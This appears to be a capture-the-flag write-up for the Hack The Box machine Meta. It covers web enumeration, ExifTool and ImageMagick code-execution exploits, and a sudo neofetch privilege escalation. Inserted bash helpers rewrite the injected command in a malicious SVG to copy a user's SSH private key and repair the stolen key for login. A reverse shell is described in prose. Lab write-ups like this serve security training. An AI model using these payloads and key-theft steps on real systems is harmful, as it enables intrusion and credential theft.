Meta is a retired Linux machine on Hack The Box. The goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to fingerprint the target.
Full Port Scan
The port scan shows two open ports: 22/tcp (OpenSSH 7.9p1) and 80/tcp (Apache httpd).
There is no obvious way in through SSH, so we enumerate port 80.
We went through the page source, Wappalyzer, WhatWeb and the browser developer tools, but found nothing useful on the main site.
We scan for files and directories with Gobuster.
Since the file and directory scan returns nothing, we run a subdomain scan with Wfuzz.
Wfuzz finds the subdomain dev01. We add dev01.artcorp.htb to /etc/hosts and open it in the browser.
We enumerate dev01.artcorp.htb.
Click on MetaView.
MetaView displays the metadata of uploaded files.
Uploading other file types such as .txt or .php fails with the error “File not allowed (only jpg/png).”
The page shows the metadata of the uploaded image. Let's modify that metadata and see whether PHP code placed in it is interpreted.
The first tag we modified did not show up in the output at all.
The application runs the uploaded file through a metadata extractor and embeds the result in the page.
After moving the payload into the Comment tag, it shows up in the comments section of the output, but only as text.
The output looks like ExifTool output, so let's check whether the ExifTool version in use has a known vulnerability.
We download the proof-of-concept code from GitHub and run it on our machine to generate the malicious image.
We upload the crafted file to the target machine, where the application processes it.
As you can see, the ls command executed. Now we write the payload that should give us a shell.
We created the file and uploaded it to the target, but did not get a shell: the command runs non-interactively, so we need a command that makes the target connect back to us.
First, let's find out where wget is on the target.
Then we wrote a command to call back to us, but still got nothing. Let's look at the exploits for this on GitHub.
We run this script and upload the generated PNG to the target.
We got a shell.
Since the shell has limited privileges, we do local enumeration.
We read /usr/local/bin/convert_images.sh and see that it uses mogrify (an ImageMagick command-line tool for resizing, blurring, cropping and converting images).
Let's check whether the installed ImageMagick version has a known vulnerability.
We create the poc.svg file from https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html on our machine.
As you can see, it created a file named muhammed under /dev/shm. Now let's change poc.svg so that it copies the SSH key of user Thomas into /dev/shm.
To grab that file, we changed the command inside poc.svg and uploaded it to the target machine again.
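The step above swaps only the command carried by poc.svg. The following added example (it is not part of the original writeup or of the linked PoC) does that swap without retyping the file, so the rest of the PoC stays byte-for-byte as downloaded. It assumes, as in the downloaded PoC, that the injected command sits between a single pair of backticks inside an image attribute; the sample SVG below is a constructed stand-in for that structure, and the path to Thomas's key is an assumption for illustration.

```shell
#!/usr/bin/env bash
# Added example, not from the original writeup or the linked PoC.
# Assumption: the PoC's command sits between one pair of backticks in an attribute.

bt='`'   # a literal backtick, so the patterns below stay readable

# Replace the text between the first pair of backticks in $1 with $2; write to $3.
set_svg_command() {
  local src=$1 cmd=$2 out=$3
  local content before rest
  content=$(cat "$src")
  before=${content%%"$bt"*}          # everything before the first backtick
  if [ "$before" = "$content" ]; then
    echo "no backtick-delimited command found in $src" >&2
    return 1
  fi
  rest=${content#*"$bt"}             # drop up to and including the first backtick
  rest=${rest#*"$bt"}                # drop the old command and its closing backtick
  printf '%s%s%s%s%s\n' "$before" "$bt" "$cmd" "$bt" "$rest" > "$out"
}

# Print the command currently embedded in an SVG (quick check before uploading).
get_svg_command() {
  local content rest
  content=$(cat "$1")
  rest=${content#*"$bt"}
  [ "$rest" != "$content" ] || return 1
  printf '%s\n' "${rest%%"$bt"*}"
}

# Constructed stand-in for poc.svg: only the structure matters here; the real
# file comes from the blog post referenced above.
make_sample_svg() {
  cat > "$1" <<'EOF'
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="100" height="100" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image authenticate='ff" `echo $(id)> ./0wned`;"' width="10" height="10" xlink:href="sample.pdf"/>
</svg>
EOF
}

# Usage: stage the key-exfiltration variant from the writeup.
# /home/thomas/.ssh/id_rsa and the /dev/shm output name are assumptions.
workdir=$(mktemp -d)
make_sample_svg "$workdir/poc.svg"
set_svg_command "$workdir/poc.svg" 'cp /home/thomas/.ssh/id_rsa /dev/shm/id_rsa' "$workdir/exfil.svg"
get_svg_command "$workdir/exfil.svg"
```

Because the command is executed by the shell that ImageMagick spawns for the PDF password, anything that makes the command fail to parse (an unbalanced quote, a stray backtick) silently kills the payload; printing it back with get_svg_command before upload catches that.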
We got the SSH key. Let's save it as id_rsa right away and connect over SSH.
(Additional note: the dashes at the beginning and end of the key, on the BEGIN and END lines, had to be put back in the right place before SSH would accept the key; until then we got an error while connecting.)
This gave us a shell as Thomas and the user flag.
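A key copied out of an exploit's output often arrives with its BEGIN/END lines mangled, with Windows line endings, or with trailing spaces, and ssh rejects all of these. The following added helper (not from the original writeup) normalises the armour lines and sets the permissions ssh insists on; the key fragment used to exercise it is constructed.

```shell
#!/usr/bin/env bash
# Added example, not from the original writeup: repair a private key whose
# BEGIN/END lines lost their dashes when it was copied out of the exfiltrated file.

# Rewrite $1 into $2: strip CRs and surrounding whitespace, then force the
# armour lines back to the exact form ssh expects, and chmod 600 the result.
fix_ssh_key() {
  local src=$1 out=$2
  tr -d '\r' < "$src" \
    | sed -E \
        -e 's/^[[:space:]]+//' \
        -e 's/[[:space:]]+$//' \
        -e 's/^-*((BEGIN|END) [A-Z ]*PRIVATE KEY)-*$/-----\1-----/' \
    > "$out"
  chmod 600 "$out"
}

# Return 0 when the first and last lines are well-formed armour lines, 1 otherwise.
check_ssh_key_armour() {
  local first last
  first=$(head -n 1 "$1")
  last=$(tail -n 1 "$1")
  case $first in
    "-----BEGIN "*" PRIVATE KEY-----") ;;
    *) return 1 ;;
  esac
  case $last in
    "-----END "*" PRIVATE KEY-----") ;;
    *) return 1 ;;
  esac
}

# Usage: fix_ssh_key exfiltrated_key.txt id_rsa && check_ssh_key_armour id_rsa
# then: ssh -i id_rsa thomas@dev01.artcorp.htb   (user/host as in the writeup)
```

The sed rule accepts both OpenSSH-format and PEM-style headers ("OPENSSH PRIVATE KEY", "RSA PRIVATE KEY"); if check_ssh_key_armour still fails after the fix, the body itself is truncated and the key has to be exfiltrated again.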
Since we don't have root, we do local enumeration again.
Let's check GTFOBins for how to get root through neofetch.
When we try to run it with sudo here, it asks for a password, which we don't know.
So we run sudo -l, which shows env_keep+=XDG_CONFIG_HOME: that environment variable is preserved when neofetch runs under sudo.
Let's exploit that by creating our own config.conf and pointing neofetch at it.
We created a config file under the same path layout (neofetch/config.conf) and put a bash reverse shell in it.
XDG_CONFIG_HOME=/tmp/.myconfig sudo neofetch then gives us a shell with root privileges.